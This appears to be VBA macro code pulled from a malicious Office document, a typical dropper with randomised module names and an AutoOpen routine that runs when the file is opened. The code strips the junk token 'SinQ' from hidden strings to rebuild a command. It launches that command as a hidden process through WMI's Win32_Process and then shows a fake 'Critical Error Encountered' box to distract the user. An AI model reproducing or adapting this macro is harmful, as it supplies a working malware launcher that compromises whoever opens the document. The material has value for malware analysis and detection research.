Attribute VB_Name = "Tiffllqaw"
Attribute VB_Base = "0{687A47F6-07AA-497C-9A95-0B8F3B4F2510}{A706F68B-B191-49B4-AF1B-3D56AA42BCDB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Ewrdulhnhoslc"

Function Main()
  On Error Resume Next
  Set Uwdpefwhku = CreateObject(DeoffuscateCode(Tiffllqaw.Qnqdugvzxehd +
  Yfkmnimlhq.Gyqpfeuaa))
  Uwdpefwhku.XSize = 5433 < 5133
  Uwdpefwhku.YSize = 5433 < 5133
  Xtdrzcya = "winmgmts:Win32_Process"
  Dim Mfwqyvshunix()
  ReDim Mfwqyvshunix(7727)
  Mfwqyvshunix(6342) = DeoffuscateCode(Yfkmnimlhq.Mrnkgrvaz + Tiffllqaw.Ntokpnml + Tiffllqaw.Fjexuuhxlvix)
  Set Nyxnehpximp = CreateObject(Bouwykkboe(Xtdrzcya))
  Xyzeqlop = Nyxnehpximp.Create((Mfwqyvshunix(6342)), Nnrhycrpaluo, Uwdpefwhku,
  Kqybibmle)
  Tehjrolvxltp = MsgBox("Critical Error Encountered")
End Function
  
Attribute VB_Name = "Jphjdaavzw"
Function DeoffuscateCode(Xtdrzcya)
  On Error Resume Next
  DeoffuscateCode = RemoveSinq(RemoveSinq(RemoveSinq(RemoveSinq(Xtdrzcya))))
End Function

Attribute VB_Name = “Kmdzedqbrxgsz"
  Function RemoveSinq(Paxfizawzshit)
  On Error Resume Next
  RemoveSinq = StrReplace(Paxfizawzshit, "SinQ", "")
End Function

Sub autoopen()
  Main
End Sub
